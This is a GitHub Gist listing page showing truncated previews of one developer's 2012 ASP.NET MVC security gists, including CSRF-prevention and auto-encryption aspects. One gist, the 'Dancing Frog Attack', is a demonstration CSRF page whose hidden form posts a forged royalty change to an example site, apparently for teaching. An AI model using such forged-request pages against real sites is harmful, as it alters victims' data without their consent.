Joe Kuemerle jkuemerle
@jkuemerle
jkuemerle / RoyaltyController
Created August 8, 2012 13:33
"Secure" Royalty Controller
using System.Web.Mvc;
namespace WebApplication.Controllers
{
public class RoyaltyController : Controller
{
public ActionResult Index()
{
return View();
}
@jkuemerle
jkuemerle / dancingfrog.html
Created August 8, 2012 14:28
Dancing Frog Attack (exploits CSRF vulnerability)
<html>
<head>
<title>Dancing Frog!!!</title>
</head>
<body>
<form name="evilform" method="post" action="http://elcheapo.com/Royalty/Edit">
<input type="hidden" id="RoyaltyPercent" name="RoyaltyPercent" value="99" />
<input id="AuthorID" name="AuthorID" type="hidden" value="213-46-8915" />
<input id="TitleID" name="TitleID" type="hidden" value="BU1032" />
</form>
@jkuemerle
jkuemerle / CSRFAttribute.cs
Created August 8, 2012 16:07
CSRF Prevention Aspect for ASP.NET MVC and PostSharp
using System;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Web.Mvc;
using PostSharp.Aspects;
using PostSharp.Extensibility;
namespace WebApplication.Aspects
@jkuemerle
jkuemerle / VerifyControllerAttribute.cs
Created August 11, 2012 03:38
ASP.NET MVC Controller verification aspect
using System;
using System.IO;
using System.Web.Mvc;
using PostSharp.Aspects;
using PostSharp.Extensibility;
namespace WebApplication.Aspects {
[Serializable]
public class VerifyControllerAttribute : TypeLevelAspect {
@jkuemerle
jkuemerle / Credential.cs
Created August 30, 2012 02:54
Credential DTO with encrypted property attributes
namespace DataAccess.DTO
{
[Aspects.EncryptedType]
public class Credential
{
public string LoginName { get; set; }
[Aspects.Encrypted]
public string Password { get; set; }
@jkuemerle
jkuemerle / IEncrypted.cs
Created August 30, 2012 03:00
IEncrypted interface for types that have auto encrypted properties
namespace DataAccess.Aspects
{
public interface IEncrypted
{
object AsClear(string Name);
}
}
@jkuemerle
jkuemerle / EncryptedTypeAttribute.cs
Created August 30, 2012 03:12
Attribute to decorate the type declaration for a class that has auto encrypted properties
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using PostSharp.Aspects;
using PostSharp.Aspects.Advices;
using PostSharp.Aspects.Dependencies;
namespace DataAccess.Aspects {
[Serializable]
@jkuemerle
jkuemerle / EncryptedAttribute.cs
Created August 30, 2012 03:35
Attribute to decorate automatically encrypted properties
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using PostSharp.Aspects;
using PostSharp.Aspects.Dependencies;
using PostSharp.Aspects.Advices;
namespace DataAccess.Aspects {
[Serializable]
@jkuemerle
jkuemerle / CredentialTest.cs
Created August 30, 2012 03:53
Unit test showing automatically encrypted property
using MbUnit.Framework;
namespace DataAccessTests {
[TestFixture]
public class CredentialTest
{
[Test]
public void TestPasswordIsEncrypted() {
var cr = new DataAccess.DTO.Credential();
cr.Password = "Password1!";
@jkuemerle
jkuemerle / payment.html
Created October 15, 2012 03:49
Payment Form
<HTML><HEAD>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<SCRIPT type="text/javascript" src="https://js.stripe.com/v1/"></SCRIPT>
<SCRIPT >
Stripe.setPublishableKey('<Stripe Public Key Here>');
function formSubmit() {
if(validatePage() == true) {
$('.submit-button').attr("disabled", "disabled");
$("#processing").html("Processing credit card...");